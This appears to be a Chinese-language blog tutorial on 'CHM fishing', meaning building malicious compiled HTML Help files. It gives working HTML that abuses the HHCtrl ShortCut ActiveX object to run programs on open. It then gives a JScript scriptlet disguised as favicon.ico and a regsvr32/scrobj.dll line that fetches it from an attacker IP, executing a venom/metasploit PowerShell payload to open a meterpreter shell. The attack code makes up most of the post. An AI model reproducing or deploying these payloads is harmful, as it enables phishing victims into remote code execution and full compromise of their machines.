Chm fishing
前言
今天早上看到一个chm钓鱼的恶意事件,一时之间感觉蛮有趣。然后上google操作了一波发现不少这种操作。后面随手打开撸了一波,这里做个笔记
资料来源:
高级组合技打造“完美” 捆绑后门 - Evi1cg
正文
首先下载Easy CHM
然后创建一个文件夹然后里面放一个html, 和几个文件夹
calc弹弹弹测试,将以下html写入
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
然后进行编译,在打开编译后的chm会发现能弹出一个calc
meterpreter反弹测试
是否会被杀软拦截:是
这里我使用venom生成payload
项目地址:GitHub - r00t-3xp10it/venom: venom (metasploit) shellcode generator/compiler/listener
选择好powershell的选项的payload获取exp,然后在攻击机新建一个fanvcio.ico写入如下:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps1 = "你的exp";
$shell=new ActiveXObject("WScript.Shell")
$shell.Run(ps1,0,true);
]]>
</script>
</registration>
</scriptlet>
然后在html写入如下
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',regsvr32.exe,/u /n /s /i:http://IP/favicon.ico scrobj.dll'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
然后在用Easy CHM编译,在打开编译后的chm就能获取到一个meterpreter
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Chm fishing
本文作者:九世
发布时间:2019-01-27, 11:50:03
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/5a94aee0.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。